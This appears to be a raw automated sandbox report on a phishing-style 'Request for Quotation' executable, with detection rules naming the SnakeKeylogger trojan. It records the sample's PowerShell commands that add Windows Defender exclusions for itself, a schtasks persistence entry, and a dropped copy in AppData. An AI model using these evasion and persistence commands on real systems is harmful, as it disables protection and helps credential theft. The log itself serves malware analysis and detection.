Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0000000E.00000002.4514729893.000000000042D000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe PID: 4408, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: jnqeRRexnD.exe PID: 6448, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: jnqeRRexnD.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack, --.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack, ----.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack, ----.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack, --.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack, ----.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack, ----.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, JqK2bvTxFx9IG6SpuA.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, JqK2bvTxFx9IG6SpuA.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, pLOjQct4uuP3G32FB9.cs Security API names: _0020.SetAccessControl
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, pLOjQct4uuP3G32FB9.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, pLOjQct4uuP3G32FB9.cs Security API names: _0020.AddAccessRule
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, pLOjQct4uuP3G32FB9.cs Security API names: _0020.SetAccessControl
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, pLOjQct4uuP3G32FB9.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, pLOjQct4uuP3G32FB9.cs Security API names: _0020.AddAccessRule
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@19/15@3/3
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe File created: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5452:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4724:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5608:120:WilError_03
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Mutant created: \Sessions\1\BaseNamedObjects\XLczWKrNQSJhyTchb
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5232:120:WilError_03
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe File created: C:\Users\user\AppData\Local\Temp\tmp2F66.tmp
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000003065000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003343000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe ReversingLabs: Detection: 34%
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe File read: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
Source: unknown Process created: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe"
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jnqeRRexnD.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jnqeRRexnD" /XML "C:\Users\user\AppData\Local\Temp\tmp2F66.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process created: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown Process created: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe C:\Users\user\AppData\Roaming\jnqeRRexnD.exe
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jnqeRRexnD" /XML "C:\Users\user\AppData\Local\Temp\tmp42C0.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Process created: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe "C:\Users\user\AppData\Roaming\jnqeRRexnD.exe"
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe"
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jnqeRRexnD.exe"
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jnqeRRexnD" /XML "C:\Users\user\AppData\Local\Temp\tmp2F66.tmp"
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process created: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe"
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jnqeRRexnD" /XML "C:\Users\user\AppData\Local\Temp\tmp42C0.tmp"
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Process created: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe "C:\Users\user\AppData\Roaming\jnqeRRexnD.exe"
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll Jump to behavior
